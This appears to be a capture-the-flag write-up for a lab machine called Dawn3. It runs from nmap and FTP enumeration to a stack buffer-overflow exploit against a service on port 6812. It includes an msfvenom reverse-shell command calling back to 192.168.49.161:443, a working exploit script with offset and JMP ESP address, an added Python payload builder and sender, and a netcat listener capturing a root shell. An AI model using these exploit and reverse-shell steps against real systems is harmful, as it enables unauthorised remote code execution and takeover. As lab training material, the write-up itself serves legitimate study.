PORT STATE SERVICE VERSION
2100/tcp open ftp pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwsrwxrwx 1 dawn3 dawn3 292728 Mar 08 2020 dawn3.exe [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.158.13:2100
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
6812/tcp closed unknown
We can log in to FTP anonymously, and nmap reports port 6812 as closed, so we don't yet know what it is for.
ftp> ls -la
-rwsrwxrwx 1 dawn3 dawn3 292728 Mar 08 2020 dawn3.exe
ftp> get dawn3.exe
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.161 LPORT=443 EXITFUNC=thread -f c -b "\x00"
import socket, struct

# Shellcode from the msfvenom command above (elided in the writeup); paste it here as bytes.
shell = b""
# Address of a JMP ESP instruction that the overwritten return address points at.
jmpesp = struct.pack("<I", 0x52501513)
# 524 bytes to reach the saved return address, then JMP ESP, a short NOP sled, the shellcode,
# and filler. Note: the 10-byte NOP sled is not subtracted from the filler, so 898 bytes
# are sent in total rather than 888.
buffer = b"A"*524 + jmpesp + b"\x90"*10 + shell + b"C" * (888 - 524 - 4 - len(shell))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.xxx", 6812))  # target IP redacted in the writeup
print("Sending payload")
s.send(buffer)
s.close()
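How the 524-byte offset and the buffer layout above can be reproduced, as an added Python example that is not the writeup's own script: it generates a cyclic pattern in the msf pattern_create style, recovers the offset from the value that landed in EIP after a crash, refuses a return address containing the bad character from the msfvenom command, and assembles the payload padded to an exact total length. The EIP value, the placeholder shellcode, and the host and port used in the main block are constructed assumptions.

```python
import socket
import string
import struct


def cyclic_pattern(length):
    """Cyclic pattern in the msf pattern_create style (Aa0Aa1Aa2...).
    Every 4-byte window is unique for the first 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip_value):
    """Offset of the four pattern bytes that overwrote EIP, given the
    register value as read in the debugger (little-endian). -1 if not found."""
    return pattern.find(struct.pack("<I", eip_value))


def ret_addr_is_clean(addr, bad_chars=b"\x00"):
    """True if the packed return address contains none of the bad characters."""
    packed = struct.pack("<I", addr)
    return not any(b in packed for b in bad_chars)


def build_payload(offset, ret_addr, shellcode, total_len, nop_len=10, bad_chars=b"\x00"):
    """A*offset | return address | NOP sled | shellcode | C filler,
    padded to exactly total_len bytes (the sled is accounted for here)."""
    if not ret_addr_is_clean(ret_addr, bad_chars):
        raise ValueError("return address contains a bad character")
    payload = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode
    if len(payload) > total_len:
        raise ValueError("payload exceeds total_len")
    return payload + b"C" * (total_len - len(payload))


def send_payload(host, port, data, timeout=5):
    """Deliver the buffer to the listening service; returns the byte count sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
    return len(data)


if __name__ == "__main__":
    # Step 1: crash the service with a pattern and read EIP in the debugger.
    pattern = cyclic_pattern(1000)
    # Constructed EIP value (the pattern bytes "4Ar5") standing in for the debugger reading.
    crash_eip = 0x35724134
    offset = pattern_offset(pattern, crash_eip)
    print("offset:", offset)  # 524
    # Step 2: assemble the payload with the JMP ESP address used in the writeup.
    shellcode = b"\xcc" * 30  # placeholder; replace with the msfvenom output
    payload = build_payload(offset, 0x52501513, shellcode, total_len=888)
    print("payload length:", len(payload))  # 888
    # Step 3, against a live target (host is an assumed placeholder):
    # send_payload("192.168.xxx", 6812, payload)
```

The check in ret_addr_is_clean is the one the writeup's exploit relies on implicitly: 0x52501513 packs to 13 15 50 52, none of which is the excluded null byte, so the address survives whatever string handling the service does before the overflow.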
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.161] from (UNKNOWN) [192.168.161.13] 53320
whoami
root